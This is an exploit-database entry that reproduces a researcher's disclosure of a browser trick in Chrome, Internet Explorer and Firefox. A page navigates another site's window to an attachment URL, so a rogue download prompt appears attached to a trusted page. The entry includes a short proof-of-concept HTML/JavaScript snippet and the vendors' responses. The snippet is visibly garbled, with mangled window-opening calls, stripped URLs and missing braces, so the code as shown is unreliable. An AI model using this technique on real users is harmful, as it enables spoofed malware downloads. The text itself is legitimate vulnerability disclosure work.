Browser Navigation Download Trick (Chrome / IE / Firefox)

ID 1337DAY-ID-18398
Type zdt
Reporter Michal Zalewski
Modified 2012-05-31T00:00:00


Exploit for multiple platform in category local exploits

                                            Another moderately interesting tidbit, I guess...

It is an important and little-known property of web browsers that one
document can always navigate other, non-same-origin windows to
arbitrary URLs. Perhaps more interestingly, you can also navigate
third-party documents to resources served with Content-Disposition:
attachment, in which case, you get the original contents of the
address bar, plus a rogue download prompt attached to an unsuspecting
page that never wanted you to download that file.


<input type=submit onclick="doit()" value="Click me. I like to be clicked.">
var w;
var once;

function doit() {

  if (navigator.userAgent.indexOf('MSIE') != -1)
    w ='page2.html', 'foo');
    w ='data:text/html,<meta http-equiv="refresh" content="0;URL=">', 'foo');

  setTimeout(donext, 4500);


function donext() {'', 'foo');
  if (once != true) setTimeout(donext, 5000);
  once = true;
Chrome: reported March 30 Fix planned, but no specific date set.

Internet Explorer: reported April 1 (case 12372gd). The vendor will not address the issue with a security patch for any current version of MSIE.

Firefox: reported March 30 No commitment to fix at this point. 

I think these responses are fine, given the sorry state of browser UI security in general; although in good conscience, I can't dismiss the problem as completely insignificant. 

More info:

It's closely related to many other fundamental, open issues with
browser UI design - but I guess it's an interesting highlight.


# [2018-04-01]  #